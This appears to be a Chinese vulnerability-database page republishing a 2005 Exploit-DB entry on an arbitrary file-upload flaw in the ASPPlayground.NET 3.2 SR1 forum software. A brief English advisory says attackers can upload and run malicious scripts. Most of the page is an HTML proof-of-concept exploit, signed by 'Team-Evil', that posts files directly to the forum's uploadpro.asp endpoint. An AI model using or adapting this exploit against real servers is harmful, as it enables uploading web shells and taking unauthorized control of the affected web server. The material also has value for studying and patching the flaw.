ASPPlayGround.NET 3.2 SR1 – Arbitrary File Upload

23次阅读
没有评论

ASPPlayGround.NET 3.2 SR1 – Arbitrary File Upload

漏洞ID 1055205 漏洞类型
发布时间 2005-06-27 更新时间 2005-06-27
ASPPlayGround.NET 3.2 SR1 - Arbitrary File UploadCVE编号 N/A
ASPPlayGround.NET 3.2 SR1 - Arbitrary File UploadCNNVD-ID N/A
漏洞平台 ASP CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/25908
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/14070/info

ASPPlayground.NET is prone to a remote arbitrary file-upload vulnerability.

Exploiting this issue may allow remote attackers to upload arbitrary files including malicious scripts and possibly execute the scripts the affected server.

This issue can ultimately help attackers gain unauthorized access in the context of the webserver. 

http://www.example.com/forum/uploadpro.asp?memori=&deletefile=&mode=

refer to

http://www.example.com/forum/post.asp

*

ASP Playground html bug :
___________________________

<html>
<head>
<title>ASP Playground Version beta 3.2 SR1 upload Arbitrary Files
</title>

</table>
<br>
<table width="98%" border="0" cellspacing="0" cellpadding="0">

<form method="POST" action="http://www.example.com/forum/uploadpro.asp?

memori=&deletefile=&mode=" enctype="multipart/form-data"

onSubmit="return respondToUploader(this)">
<tr>
<td bgcolor="8d5a18">
<table width="100%" border="0" cellspacing="1"

cellpadding="4">
<tr>
<td bgcolor="f8fff3">
upload<br>
<input type="file" name="File1" size="22">
</td>
</tr>
</table>
</td>
</tr>
<tr>
<td>
<hr size="1" noshade>
</td>
</tr>
<tr>
<td align="right">
<input type="submit" name="submit" value="upload">

</td>
</tr>
</form>

</table>
</body>
<center><b>pOWERED By Team-Evil [email protected]
</html>

相关推荐: 3Com SuperStack Switch Web Interface Denial Of Service Vulnerability

3Com SuperStack Switch Web Interface Denial Of Service Vulnerability 漏洞ID 1098308 漏洞类型 Failure to Handle Exceptional Conditions 发布…

正文完
 0